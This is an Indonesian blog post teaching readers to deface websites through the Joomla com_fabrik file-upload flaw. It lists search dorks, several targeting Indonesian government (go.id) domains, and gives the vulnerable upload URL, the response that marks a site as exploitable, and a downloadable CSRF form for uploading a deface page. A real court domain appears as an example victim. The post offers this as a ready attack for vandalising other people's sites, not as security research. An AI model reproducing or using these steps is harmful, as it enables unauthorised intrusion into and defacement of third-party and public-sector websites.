Cara deface metode com fabrik

Assalamualaikum wr.wb

Oke gan disini gua akan praktikan Cara Deface Com Fabrik, ok simak baik baik!


Dork:
inurl:/com_fabrik site:go.id
inurl:index.php?option=com_fabrik site:
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com

Stelah dapat target, masukin exploitnya
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Vuln? Ada tulisan
{"filepath":null,"uri":null}
Klo dah ktmu gitu kta pke csrfnya,
bagi yang belum punya CSRFnya, kalian bisa memakai punya saya. download csrfnya dulu disini https://drive.google.com/file/d/1lbN2uKJjEtpg4nN5unf7IkP1sSeFOxnK/view?usp=drivesdk

jika sudah di download, ubah perintah htmlnya di apk dcoder atau diapk coding yang kalian pakai saat ini, seperti ini.
Tempel web target dibelakang teks action="WEB TARGET


  
Trus kita save dngan 2lul.html, dan buka file 2lul.html tersebut, Gambarnya akan seperti ini



Trus klo udah gitu tinggal kita upload file script defacenya, jika sudah di upload Tampilannya akan seperti gambar di bawah ini, Dan cara melihat hasil script defacenya seperti ini, misalkan disitu tertulis  {"filepath":"\/html_pemformatan_text.html","uri":"http:\/\/pn-jeneponto.go.id\/namascriptkalian.html"} nah kalian tinggal salin aja dari bagian https:// sampai nama script kalian.html, dan jangan lupa tanda garis miring sepeeti ini  ( \ ) hapus!. Oh ya satu lagi Format nama Script Deface kalian bebas, contoh: LulNazi.html / namakalian.html




Nah jika kita lihat hasilnya akan terlihat sperti script yang kalian upload tadi.



Nahh sudah ditebas:v

Okee sampai disini tutorial dari saya, jika ada yang ingin ditanyakan, Hubungi saya di wa:085930261707
dan jangan lupa kunjungi chanel Youtube saya di 
Gon Chanel

Komentar

Posting Komentar

Postingan populer dari blog ini